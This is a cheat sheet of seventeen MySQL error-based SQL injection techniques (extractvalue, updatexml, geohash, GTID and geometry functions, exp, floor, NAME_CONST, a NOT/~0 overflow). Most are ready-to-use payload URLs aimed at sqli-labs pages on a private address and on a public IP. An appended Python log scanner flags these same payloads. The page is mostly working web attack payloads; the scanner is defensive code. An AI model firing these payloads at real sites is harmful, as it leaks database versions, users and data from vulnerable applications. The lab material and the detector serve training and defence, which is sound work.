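- 1. extractvalue error-based injection
- 2. updatexml error-based injection
- 3. ST_LatFromGeoHash() error-based injection
- 4. ST_LongFromGeoHash() error-based injection
- 5. GTID_SUBSET() error-based injection
- 6. GTID_SUBTRACT() error-based injection
- 7. ST_PointFromGeoHash() error-based injection
- 8. polygon() error-based injection
- 9. exp() error-based injection
- 10. multipoint() error-based injection
- 11. geometrycollection() error-based injection
- 12. multipolygon() error-based injection
- 13. linestring() error-based injection
- 14. multilinestring() error-based injection
- 15. floor() error-based injection
- 16. NAME_CONST() injection
- 17. Overflow error-based injection using !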
1. extractvalue error-based injection
http://192.168.64.135//sqlib/Less-1/index.php?id=1' and (extractvalue(1,concat(0x3a,version())),1)--+
SELECT EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'));
Bypassing the error-message length limit
http://43.247.91.228:84/Less-1/?id=1' and EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'))--+
Hex-decode the result twice
2. updatexml error-based injection
http://192.168.64.135//sqlib/Less-1/index.php?id=1' and updatexml(1,concat(0x3a,version()),3)--+
SQL statement
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x3a,version()),3)-- ' LIMIT 0,1
3. ST_LatFromGeoHash() error-based injection
MariaDB 5.5.65 does not support this error-based injection, and MySQL 5.0, 5.1 and 5.5 do not have it either
[root@localhost ~]# mysql --version
mysql Ver 15.1 Distrib 5.5.65-MariaDB, for Linux (x86_64) using readline 5.1
MySQL 5.7 supports this error-based injection:
select ST_LatFromGeoHash(user());
select ST_LatFromGeoHash(version());
4. ST_LongFromGeoHash() error-based injection
MySQL 5.7 supports this error-based injection
select ST_LongFromGeoHash(version());
select ST_LongFromGeoHash(user());
5. GTID_SUBSET() error-based injection
select GTID_SUBSET(version(),1);
select GTID_SUBSET(user(),1);
6. GTID_SUBTRACT() error-based injection
select GTID_SUBTRACT(version(),1);
select GTID_SUBTRACT(user(),1);
7. ST_PointFromGeoHash() error-based injection
select ST_PointFromGeoHash(version(),1);
select ST_PointFromGeoHash(user(),1);
8. polygon() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and polygon((select * from(select * from(select user())a)b))--+
9. exp() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and exp(~(select * from(select user())a))--+
10. multipoint() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and multipoint((select * from(select * from(select version())a)b))--+
11. geometrycollection() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and geometrycollection((select * from(select * from(select user())a)b))--+
12. multipolygon() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and multipolygon((select * from(select * from(select user())a)b))--+
13. linestring() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and linestring((select * from(select * from(select user())a)b))--+
14. multilinestring() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and multilinestring((select * from(select * from(select user())a)b))--+
15. floor() error-based injection
http://43.247.91.228:84/Less-1/?id=1' and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
16. NAME_CONST() injection
http://43.247.91.228:84/Less-1/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+
17. Overflow error-based injection using !
http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20(!(select%20*%20from%20(select%20user())x)%20-%20~0),2,3--+
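Added example (not part of the original notes): a Python access-log scanner that flags the function names from sections 1-16 and the !/~0 pattern from section 17 in URL-decoded query strings. The log lines are constructed, and the `not_overflow` label and the SQL-context heuristic are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Function names from sections 1-16 of this page, matched only as calls: name(
ERROR_FUNCS = (
    "extractvalue", "updatexml", "st_latfromgeohash", "st_longfromgeohash",
    "st_pointfromgeohash", "gtid_subset", "gtid_subtract", "polygon", "exp",
    "multipoint", "geometrycollection", "multipolygon", "linestring",
    "multilinestring", "floor", "name_const",
)
FUNC_RE = re.compile(r"\b(" + "|".join(ERROR_FUNCS) + r")\s*\(", re.I)
# Section 17: logical NOT of a subquery combined with ~0
OVERFLOW_RE = re.compile(r"!\s*\(\s*select\b.*~\s*0", re.I | re.S)
# Require SQL context so a bare "floor(2.5)" parameter is not flagged (heuristic)
SQL_CTX_RE = re.compile(r"\b(select|union)\b|['\")\d]\s*\b(and|or)\b", re.I)
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_request(target):
    """Return the sorted technique names found in a request target's query."""
    query = urlsplit(target).query
    decoded = unquote_plus(unquote_plus(query))  # tolerate double encoding
    if not SQL_CTX_RE.search(decoded):
        return []
    hits = {m.group(1).lower() for m in FUNC_RE.finditer(decoded)}
    if OVERFLOW_RE.search(decoded):
        hits.add("not_overflow")  # label chosen for this example
    return sorted(hits)

def scan_log(lines):
    """Return [(line_number, techniques)] for access-log lines that match."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        hits = scan_request(m.group(1)) if m else []
        if hits:
            findings.append((n, hits))
    return findings

# Constructed access-log lines; the payloads are the ones shown on this page.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=1%27%20and%20updatexml(1,concat(0x3a,version()),3)--+ HTTP/1.1" 200 530',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-1/?id=1%27%20and%20polygon((select%20*%20from(select%20*%20from(select%20user())a)b))--+ HTTP/1.1" 200 541',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-5/?id=1%27%20union%20select%20(!(select%20*%20from%20(select%20user())x)%20-%20~0),2,3--+ HTTP/1.1" 200 498',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /calc?expr=floor(2.5) HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Name matching like this is a triage signal for logs and WAF rules; the fix for the injectable query itself is a parameterized statement.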